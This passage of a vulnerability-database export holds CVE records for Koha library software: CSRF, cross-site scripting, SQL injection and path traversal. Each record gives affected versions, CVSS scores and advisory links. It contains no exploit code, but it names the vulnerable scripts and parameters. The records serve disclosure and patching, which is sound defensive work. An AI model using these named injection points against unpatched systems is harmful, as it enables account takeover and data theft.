          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-01-24T17:15:12.173",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://koha-community.org/security-release-february-2014/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://koha-community.org/security-release-february-2014/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2018-10-18 21:29
Modified
2024-11-21 02:31
Summary
Multiple cross-site request forgery (CSRF) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to (1) hijack the authentication of administrators for requests that create a user via a request to members/memberentry.pl or (2) give a user superlibrarian permission via a request to members/member-flags.pl or (3) hijack the authentication of arbitrary users for requests that conduct cross-site scripting (XSS) attacks via the addshelf parameter to opac-shelves.pl.
References
cve@mitre.org | https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 | Exploit, Issue Tracking, Vendor Advisory
cve@mitre.org | https://koha-community.org/koha-3-14-16-released/ | Product, Release Notes, Vendor Advisory
cve@mitre.org | https://koha-community.org/security-release-koha-3-16-12/ | Product, Release Notes, Vendor Advisory
cve@mitre.org | https://koha-community.org/security-release-koha-3-18-8/ | Product, Release Notes, Vendor Advisory
cve@mitre.org | https://koha-community.org/security-release-koha-3-20-1/ | Product, Release Notes, Vendor Advisory
cve@mitre.org | https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html | Exploit, Third Party Advisory, VDB Entry
cve@mitre.org | https://seclists.org/fulldisclosure/2015/Jun/80 | Exploit, Mailing List, Third Party Advisory
cve@mitre.org | https://www.exploit-db.com/exploits/37389/ | Third Party Advisory, VDB Entry
cve@mitre.org | https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ | Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 | Exploit, Issue Tracking, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://koha-community.org/koha-3-14-16-released/ | Product, Release Notes, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://koha-community.org/security-release-koha-3-16-12/ | Product, Release Notes, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://koha-community.org/security-release-koha-3-18-8/ | Product, Release Notes, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://koha-community.org/security-release-koha-3-20-1/ | Product, Release Notes, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html | Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108 | https://seclists.org/fulldisclosure/2015/Jun/80 | Exploit, Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://www.exploit-db.com/exploits/37389/ | Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108 | https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ | Third Party Advisory
Impacted products
Vendor Product Version
koha koha *
koha koha *
koha koha *
koha koha *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "214E9AA7-580C-4028-AB21-0D723D3037FD",
              "versionEndExcluding": "3.14.16",
              "versionStartIncluding": "3.14.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CEBF9831-C8D6-4503-8192-13D04FB057DB",
              "versionEndExcluding": "3.16.12",
              "versionStartIncluding": "3.16.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A50154EE-37E5-4872-8A1C-57AA8132E91B",
              "versionEndExcluding": "3.18.8",
              "versionStartIncluding": "3.18.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "AE6E0A0A-BA1C-4F6B-92E0-796FFD77AF41",
              "versionEndExcluding": "3.20.1",
              "versionStartIncluding": "3.20.00",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple cross-site request forgery (CSRF) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to (1) hijack the authentication of administrators for requests that create a user via a request to members/memberentry.pl or (2) give a user superlibrarian permission via a request to members/member-flags.pl or (3) hijack the authentication of arbitrary users for requests that conduct cross-site scripting (XSS) attacks via the addshelf parameter to opac-shelves.pl."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples vulnerabilidades Cross-Site Request Forgery (CSRF) en Koha, en versiones 3.14.x anteriores a la 3.14.16, versiones 3.16.x anteriores a la 3.16.12, versiones 3.18.x anteriores a la 3.18.08 y versiones 3.20.x anteriores a la 3.20.1, permiten que atacantes remotos (1) secuestren la autenticaci\u00f3n de los administradores para peticiones que crean un usuario mediante una petici\u00f3n a members/memberentry.pl, (2) otorguen a un usuario el permiso superlibrarian mediante una petici\u00f3n a members/member-flags.pl o (3) secuestren la autenticaci\u00f3n de usuarios arbitrarios para peticiones que llevan a cabo ataques Cross-Site Scripting (XSS) mediante el par\u00e1metro addshelf en opac-shelves.pl."
    }
  ],
  "id": "CVE-2015-4630",
  "lastModified": "2024-11-21T02:31:26.230",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.0,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.1,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-10-18T21:29:00.270",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/koha-3-14-16-released/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-16-12/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-18-8/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-20-1/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/37389/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/koha-3-14-16-released/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-16-12/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-18-8/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-20-1/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/37389/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-352"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2018-10-18 21:29
Modified
2024-11-21 02:31
Summary
Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl.
References
cve@mitre.org | https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416 | Exploit, Issue Tracking, Vendor Advisory
cve@mitre.org | https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418 | Exploit, Issue Tracking, Vendor Advisory
cve@mitre.org | https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 | Exploit, Issue Tracking
cve@mitre.org | https://koha-community.org/koha-3-14-16-released/ | Product, Release Notes, Vendor Advisory
cve@mitre.org | https://koha-community.org/security-release-koha-3-16-12/ | Product, Release Notes, Vendor Advisory
cve@mitre.org | https://koha-community.org/security-release-koha-3-18-8/ | Product, Release Notes, Vendor Advisory
cve@mitre.org | https://koha-community.org/security-release-koha-3-20-1/ | Product, Release Notes, Vendor Advisory
cve@mitre.org | https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html | Exploit, Third Party Advisory, VDB Entry
cve@mitre.org | https://seclists.org/fulldisclosure/2015/Jun/80 | Exploit, Mailing List, Third Party Advisory
cve@mitre.org | https://www.exploit-db.com/exploits/37389/ | Exploit, Third Party Advisory, VDB Entry
cve@mitre.org | https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ | Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416 | Exploit, Issue Tracking, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418 | Exploit, Issue Tracking, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 | Exploit, Issue Tracking
af854a3a-2127-422b-91ae-364da2661108 | https://koha-community.org/koha-3-14-16-released/ | Product, Release Notes, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://koha-community.org/security-release-koha-3-16-12/ | Product, Release Notes, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://koha-community.org/security-release-koha-3-18-8/ | Product, Release Notes, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://koha-community.org/security-release-koha-3-20-1/ | Product, Release Notes, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html | Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108 | https://seclists.org/fulldisclosure/2015/Jun/80 | Exploit, Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://www.exploit-db.com/exploits/37389/ | Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108 | https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ | Third Party Advisory
Impacted products
Vendor Product Version
koha koha *
koha koha *
koha koha *
koha koha *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "214E9AA7-580C-4028-AB21-0D723D3037FD",
              "versionEndExcluding": "3.14.16",
              "versionStartIncluding": "3.14.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CEBF9831-C8D6-4503-8192-13D04FB057DB",
              "versionEndExcluding": "3.16.12",
              "versionStartIncluding": "3.16.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A50154EE-37E5-4872-8A1C-57AA8132E91B",
              "versionEndExcluding": "3.18.8",
              "versionStartIncluding": "3.18.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "AE6E0A0A-BA1C-4F6B-92E0-796FFD77AF41",
              "versionEndExcluding": "3.20.1",
              "versionStartIncluding": "3.20.00",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples vulnerabilidades Cross-Site Scripting (XSS) en Koha, en versiones 3.14.x anteriores a la 3.14.16, versiones 3.16.x anteriores a la 3.16.12, versiones 3.18.x anteriores a la 3.18.08 y versiones 3.20.x anteriores a la 3.20.1, permiten que atacantes remotos inyecten scripts web o HTML arbitrarios mediante (1) el par\u00e1metro tag en opac-search.pl; (2) el par\u00e1metro value en authorities/authorities-home.pl; (3) el par\u00e1metro delay en acqui/lateorders.pl; (4) los par\u00e1metros authtypecode o (5) tagfield en admin/auth_subfields_structure.pl; (6) el par\u00e1metro tagfield en admin/marc_subfields_structure.pl; (7) el par\u00e1metro limit en catalogue/search.pl; (8) los par\u00e1metros bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter o (13) title_filter en serials/serials-search.pl; o (14) los par\u00e1metros author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from o (22) suggesteddate_to en suggestion/suggestion.pl o los par\u00e1metros (23) direction, (24) display o (25) addshelf en opac-shelves.pl."
    }
  ],
  "id": "CVE-2015-4631",
  "lastModified": "2024-11-21T02:31:26.413",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "LOW",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "NONE",
          "baseScore": 3.5,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.0"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-10-18T21:29:00.723",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/koha-3-14-16-released/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-16-12/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-18-8/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-20-1/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/37389/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/koha-3-14-16-released/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-16-12/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-18-8/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-20-1/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/37389/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-01-24 17:15
Modified
2024-11-21 02:05
Severity ?
Summary
SQL injection vulnerability in the MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged by remote attackers using CVE-2014-1924.
Impacted products
Vendor Product Version
koha koha *
koha koha *
koha koha *
koha koha *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "217F4C5D-055C-43AA-983A-51CF9408B213",
              "versionEndExcluding": "3.08.23",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9D66E4EE-C4FC-411F-957B-F21A618EBC7E",
              "versionEndExcluding": "3.10.13",
              "versionStartIncluding": "3.10.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "173A2792-F4A9-4378-9CA7-6FAE08D75492",
              "versionEndExcluding": "3.12.10",
              "versionStartIncluding": "3.12.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "2DE8FEB3-A97F-4F8C-A5FC-4B70E6E08859",
              "versionEndExcluding": "3.14.03",
              "versionStartIncluding": "3.14.00",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SQL injection vulnerability in the MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged by remote attackers using CVE-2014-1924."
    },
    {
      "lang": "es",
      "value": "Una vulnerabilidad de inyecci\u00f3n SQL en la funci\u00f3n MARC framework import/export (archivo admin/import_export_framework.pl) en Koha versiones anteriores a 3.8.23, versiones 3.10.x anteriores a 3.10.13, versiones 3.12.x anteriores a 3.12.10 y versiones 3.14.x anteriores a 3.14.3, permite usuarios autenticados remotos para ejecutar comandos SQL arbitrarios por medio de vectores no especificados. NOTA: esto puede ser aprovechado por los atacantes remotos utilizando el CVE-2014-1924."
    }
  ],
  "id": "CVE-2014-1925",
  "lastModified": "2024-11-21T02:05:17.213",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
